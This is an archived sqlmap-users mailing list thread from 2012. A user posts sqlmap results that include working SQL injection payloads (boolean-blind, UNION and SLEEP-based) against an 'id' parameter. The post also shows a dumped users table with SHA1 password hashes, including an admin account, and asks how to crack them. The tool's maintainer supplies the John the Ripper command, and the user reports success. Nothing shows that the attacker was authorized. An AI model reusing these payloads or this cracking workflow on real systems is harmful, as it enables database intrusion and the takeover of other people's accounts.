Re: [sqlmap-users] doubt on the table
Brought to you by:
inquisb
From: <dr...@sa...> - 2012-12-12 10:31:55
|
Well i installed the jumbo version and used ur command and it worked tnx. Quoting Miroslav Stampar <mir...@gm...>: > > Hi. > > Please try with: > > john --format=raw-sha1 pwd > > Kind regards, > Miroslav Stampar > > On Tue, Dec 11, 2012 at 11:49 PM, <dr...@sa...> wrote: >> >> >> how do i crack this dumps ? >> >> >> Place: GET >> Parameter: id >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: id=37 AND 5567=5567 >> >> Type: UNION query >> Title: MySQL UNION query (NULL) - 6 columns >> Payload: id=-1879 UNION ALL SELECT >> >> NULL,NULL,CONCAT(0x3a7876633a,0x4f737648636161497a5a,0x3a6f63633a),NULL,NULL,NULL# >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: id=37 AND SLEEP(5) >> --- >> >> >> >> Table: users >> [2 entries] >> +----+-----------+--------+------------------------------------------+ >> | id | nome | status | password | >> +----+-----------+--------+------------------------------------------+ >> | 15 | alexandra | 1 | 9e19a4e7642ae910145d3015e36824d03aa64026 | >> | 16 | admin | 1 | 9e19a4e7642ae910145d3015e36824d03aa64026 | >> +----+-----------+--------+------------------------------------------+ >> >> [d@whitechat run]$ cat pwd >> 9e19a4e7642ae910145d3015e36824d03aa64026 >> 9e19a4e7642ae910145d3015e36824d03aa64026 >> >> [d@whitechat run]$ ./john pwd >> No password hashes loaded (see FAQ) >> >> >> >> >> Com os melhores cumprimentos , Luis Gomes. >> >> >> ------------------------------------------------------------------------------ >> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial >> Remotely access PCs and mobile devices and provide instant support >> Improve your efficiency, and focus on delivering more >> value-add services >> Discover what IT Professionals Know. Rescue delivers >> http://p.sf.net/sfu/logmein_12329d2d >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > > -- > Miroslav Stampar > http://about.me/stamparm > Com os melhores cumprimentos , Luis Gomes. |